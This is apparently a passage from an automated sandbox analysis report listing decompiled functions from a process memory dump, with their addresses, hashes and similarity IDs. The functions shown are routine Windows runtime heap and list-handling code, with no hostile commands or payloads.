Instruction Fuzzy Hash: 3C21BE31B01680DBEB269B69C954B3977E8EF54744F1900E9ED048B7A2F774FC81D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 046D7794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E046D7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4747b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0469F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04677D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04699AE0();
					_t24 = L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x046d7799
0x046d779a
0x046d779b
0x046d77a3
0x046d77ab
0x046d77ae
0x046d77b1
0x046d77b1
0x046d77bf
0x046d77c4
0x046d77c8
0x046d77ce
0x046d77d4
0x046d77e0
0x046d77e0
0x046d77d6
0x046d77d6
0x046d77de
0x00000000
0x00000000
0x046d77de
0x046d77e5
0x046d77f0
0x046d77f3
0x046d77f6
0x046d77fd
0x046d7800
0x046d780c
0x046d7818
0x046d782b
0x046d781a
0x046d7823
0x046d7823
0x046d7830
0x046d7831
0x046d7838
0x046d783d
0x046d783e
0x046d784f
0x046d784f
0x046d785a

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d218688ba9a9e455fd70daeda42b73fe3e1969b3441b2e62c2dbbf78b60fc391
Instruction ID: 1a11ce5da0cb791db02bdcd8ee88c97bc93ee5bbae87b7aabe9ab9f3d2b09086
Opcode Fuzzy Hash: d218688ba9a9e455fd70daeda42b73fe3e1969b3441b2e62c2dbbf78b60fc391
Instruction Fuzzy Hash: 72218E72900644AFC725DF69D890EABB7A9EF48741F10456EF50AD7750E634F900CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0468FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0468FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E046676E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0468fd9b
0x0468fda0
0x0468fda1
0x0468fdab
0x0468fdad
0x0468fdb0
0x0468fdb8
0x0468fe0f
0x0468fde6
0x0468fde9
0x0468fdec
0x046cc0c0
0x0468fdfe
0x0468fe06
0x0468fe06
0x046cc0c8
0x0468fe2d
0x0468fe2d
0x00000000
0x0468fe2d
0x046cc0d1
0x046cc0e0
0x046cc0e5
0x046cc0e5
0x046cc0e8
0x00000000
0x046cc0e8
0x0468fdf4
0x00000000
0x00000000
0x0468fdf6
0x0468fdfa
0x0468fe1a
0x0468fe1f
0x0468fe1f
0x0468fdfc
0x00000000
0x0468fdfc
0x0468fdcc
0x0468fdd0
0x0468fe26
0x00000000
0x0468fe26
0x0468fdd8
0x0468fddb
0x0468fddd
0x0468fde0
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 203ae0337ee8a4d3af69f9b1663b38beb08bfeb78eade33e5e959d434d070a94
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 5C217972600A41EBD739EF09C544A66F7E5EBA4B11F24826EE94987710F771BC01DB80

Uniqueness

Uniqueness Score: -1.00%

Function 04659240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04659240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x472f708);
				E046AD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E046995D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E046995D0();
				_t33 =  *0x47484c4; // 0x0
				L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x47484c4; // 0x0
				L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x47484c4; // 0x0
				E04672280(L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x47486b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E046995D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E046995D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04659325();
					_t50 =  *0x47484c4; // 0x0
					return E046AD0D1(L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x04659240
0x04659242
0x04659247
0x0465924c
0x0465924e
0x04659255
0x04659257
0x0465925a
0x0465925f
0x0465925f
0x04659266
0x04659271
0x04659276
0x04659279
0x0465927e
0x04659295
0x0465929a
0x046592b1
0x046592b6
0x046592d7
0x046592dc
0x046592e0
0x046592e6
0x046592e8
0x046592ee
0x04659332
0x04659333
0x04659337
0x04659338
0x0465933a
0x0465933a
0x0465933d
0x04659342
0x04659342
0x04659345
0x04659349
0x0465934e
0x04659352
0x04659357
0x046592f4
0x046592f4
0x046592f6
0x046592f9
0x04659300
0x04659306
0x04659324
0x04659324

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c592b0ddb82e8073e5aaadb40b7ef6d3bcd03e5a46e724b4f6a308db0d94fef
Instruction ID: 9fe7f59a89497b41abeaf413d318c8cda3f833c604b8950e8320770449d01678
Opcode Fuzzy Hash: 9c592b0ddb82e8073e5aaadb40b7ef6d3bcd03e5a46e724b4f6a308db0d94fef
Instruction Fuzzy Hash: 932125B1040A00DFD721EF28CA00B5AB7B9EB08709F05456DE049866B1EB34F945CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0468B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0468B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04672280(_t12, 0x4748608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E046900C2(0x4748608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0468b395
0x0468b3a2
0x0468b3a5
0x0468b3aa
0x0468b3b2
0x0468b3ba
0x0468b3bd
0x0468b3c0
0x0468b3c4
0x0468b3c9
0x046ca3e9
0x046ca3ed
0x046ca3f0
0x046ca3ff
0x046ca403
0x046ca409
0x00000000
0x00000000
0x046ca40b
0x046ca40b
0x046ca40f
0x046ca415
0x046ca423
0x046ca423
0x046ca415
0x0468b3d1
0x0468b3e8
0x0468b3e8
0x0468b3d9

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2d461c1c2900348d2c789cb6f9f4f968bc8418bf23b2edb57d777cea72808d4
Instruction ID: e0d6b848f476c42ea75ac1475e239eecca73071c9805e5636bb8be40b0801b64
Opcode Fuzzy Hash: c2d461c1c2900348d2c789cb6f9f4f968bc8418bf23b2edb57d777cea72808d4
Instruction Fuzzy Hash: 771148373011249BDB18EA549D81A3B7396EBD5730B29423DE92AD7380FA31BC02D6D5

Uniqueness

Uniqueness Score: -1.00%

Function 046E4257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E046E4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x47308d0);
				E046AD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E046E41E8(__ebx, __edi, __ecx, _t39);
				E0466EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x47487e4;
					_t18 =  *0x47487e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4745cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x47487e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x47487e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04657055(_t31 + 0xfffffff8);
								_t24 =  *0x47487e0; // 0x0
								_t18 = _t24 - 1;
								 *0x47487e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4745cd0;
				if( *0x4745cd0 <= 0) {
					L04657055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x47487e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x47487e8 = _t30;
						 *0x47487e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E046AD0D1(L046E4320());
			}

0x046e4257
0x046e4257
0x046e4257
0x046e4259
0x046e425e
0x046e4263
0x046e4265
0x046e4273
0x046e4278
0x046e427c
0x046e427f
0x046e4281
0x046e4287
0x046e42d7
0x046e42d7
0x046e42da
0x046e428d
0x046e428d
0x046e428f
0x046e4292
0x046e4297
0x046e429c
0x046e42a0
0x046e42a6
0x046e42a8
0x046e42ae
0x046e42b3
0x00000000
0x046e42ba
0x046e42ba
0x046e42bf
0x046e42c5
0x046e42ca
0x046e42cf
0x046e42d0
0x00000000
0x046e42d0
0x046e42b3
0x00000000
0x046e42a6
0x046e429c
0x046e42dc
0x046e42dc
0x046e42e3
0x046e4309
0x046e42e5
0x046e42e5
0x046e42e8
0x046e42ee
0x046e42f0
0x00000000
0x046e42f2
0x046e42f2
0x046e42f4
0x046e42f7
0x046e42f9
0x046e4300
0x046e4300
0x046e42f0
0x046e430e
0x046e431f

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecb0d1aee4f75569ac415fc7c8294496a22c8cfe2c77d2334057f5bccb192ca
Instruction ID: 3ed04d0aff09088b169372a5d6173e19d3c8415e09944ae85bc1c927f609ab0d
Opcode Fuzzy Hash: 5ecb0d1aee4f75569ac415fc7c8294496a22c8cfe2c77d2334057f5bccb192ca
Instruction Fuzzy Hash: F0213478502605CFDB16EFA6E010AB4B7E5FB85319B12C26FC1158B791FB39A881CF45

Uniqueness

Uniqueness Score: -1.00%

Function 046D46A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E046D46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0469F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0468D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L046777F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x046d46b7
0x046d46ba
0x046d46c5
0x046d46c8
0x046d46d0
0x046d46d4
0x046d46e6
0x046d46e9
0x046d46f4
0x046d46ff
0x046d4705
0x046d4706
0x046d470c
0x046d4713
0x046d471b
0x046d4723
0x046d4725
0x046d46d6
0x046d46d9
0x046d46db
0x046d46db
0x046d4732

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 92b93b030b50460da072a4c46fbe7ff3a2f5ce2d10c69e18af0fcd7b54ca21da
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 8F11E572A04208BFDB159F5CD8808BEB7B9EF95314F10806EF944C7350EA31AD55D7A8

Uniqueness

Uniqueness Score: -1.00%

Function 0465C962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0465C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x474d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0466EEF0(0x47470a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E046DF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0466EB70(_t29, 0x47470a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0469B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E046DF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x47470c0; // 0x0
					while(_t38 != 0x47470c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x474b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0465c96a
0x0465c974
0x0465c988
0x0465c98a
0x046c7c9d
0x046c7c9f
0x046c7ca4
0x046c7cae
0x046c7cf0
0x046c7cf5
0x046c7cfa
0x0465c992
0x0465c996
0x0465c997
0x0465c998
0x0465c9a3
0x0465c9a3
0x046c7cb0
0x046c7cb7
0x046c7cbb
0x00000000
0x00000000
0x046c7cbd
0x046c7ce8
0x046c7cc5
0x046c7cc8
0x046c7cca
0x046c7cd0
0x046c7cd6
0x046c7cde
0x046c7ce4
0x046c7ce4
0x046c7cd0
0x00000000
0x046c7ce8
0x0465c990
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb1255c405cbab17923c719d4bb34ef592ea73ba0c1c1d019c74e0ccd93de9a9
Instruction ID: f6437dc210c9f8e5c03334976df5e36e8b8c0a0ea8cc3245017a828d61998657
Opcode Fuzzy Hash: cb1255c405cbab17923c719d4bb34ef592ea73ba0c1c1d019c74e0ccd93de9a9
Instruction Fuzzy Hash: 38118E727006479FDB24AF69DC85A7AB7E5FBD8619B00092DE84683660FB25FC10CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 046937F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E046937F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04672280(_t6, 0x4748550);
				}
				_t29 = E0469387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0466FFB0(0x4748550, _t27, 0x4748550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x046937fa
0x046937fc
0x04693805
0x04693808
0x04693808
0x04693814
0x04693818
0x04693846
0x04693848
0x0469384b
0x0469384b
0x04693852
0x00000000
0x04693854
0x04693856
0x00000000
0x00000000
0x04693863
0x00000000
0x04693863
0x0469381a
0x0469381a
0x0469381f
0x0469386e
0x0469386e
0x04693871
0x04693873
0x04693873
0x04693868
0x00000000
0x04693868
0x04693821
0x04693826
0x00000000
0x00000000
0x04693828
0x0469382a
0x04693841
0x00000000
0x04693841

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c896b4b09fcb6a4175bc3991c569227d53ac35172a15743bfdb463f33ac3666
Instruction ID: e1eed3c97068cb0e4f6971dbed9f3eaef10d0e30a683411c01c68966561df18a
Opcode Fuzzy Hash: 5c896b4b09fcb6a4175bc3991c569227d53ac35172a15743bfdb463f33ac3666
Instruction Fuzzy Hash: 3E01C4B2A016109BDB279F199B40A26BBEEDF99B54716406DED468B310F770FC41C780

Uniqueness

Uniqueness Score: -1.00%

Function 0466766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0466766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0468F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0468F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04674620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x04667672
0x0466767f
0x04667689
0x046676de
0x046676de
0x0466768b
0x04667691
0x04667693
0x04667697
0x00000000
0x04667699
0x046676a8
0x00000000
0x046676aa
0x046676ad
0x046676b1
0x00000000
0x046676b3
0x046676b3
0x046676b5
0x046676ba
0x046676bc
0x046676bc
0x046676c0
0x00000000
0x046676c2
0x046676ce
0x046676ce
0x046676c0
0x046676b1
0x046676a8
0x04667697
0x046676d9

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: afcb3fb53e7c3b23196725de8ceafcf697095e7272cfdb83acd202799e59b653
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: C3017532701119ABD720AE5ECC45E5BB7ADEB84765F240528B90ACB250FA20ED0187A4

Uniqueness

Uniqueness Score: -1.00%

Function 046EC450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E046EC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04699910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E046995B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E046995D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E046995D0();
				return L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x046ec458
0x046ec45d
0x046ec466
0x046ec468
0x046ec469
0x046ec46a
0x046ec46b
0x046ec46e
0x046ec46f
0x046ec471
0x046ec476
0x046ec476
0x046ec47c
0x046ec47e
0x046ec480
0x046ec480
0x046ec483
0x046ec484
0x046ec486
0x046ec488
0x046ec48f
0x046ec491
0x046ec493
0x046ec493
0x046ec48f
0x046ec498
0x046ec49e
0x046ec4ad
0x046ec4ad
0x046ec4b2
0x046ec4b4
0x046ec4cd

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 49b54aee63de494689baef066fe4eec9db5a6644fc34c476aa86f8ce020cc0c8
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
